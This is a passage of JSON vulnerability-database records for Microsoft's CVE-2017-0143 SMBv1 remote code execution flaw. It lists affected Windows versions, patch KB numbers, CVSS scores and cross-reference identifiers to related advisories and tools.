Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T08:45:23", "differentElements": ["msAffectedSoftware"], "edition": 70}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T10:55:46", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3213986", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KB3212646", "KB4012212", "KB4012214", "KB3205401", "KB4013429", "KB4012215", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4013198", "KB3210720"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T10:55:46", "differentElements": ["msAffectedSoftware"], "edition": 71}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f34700f5fafe59f3b729f742aac31bd5", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-20T12:46:46", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, 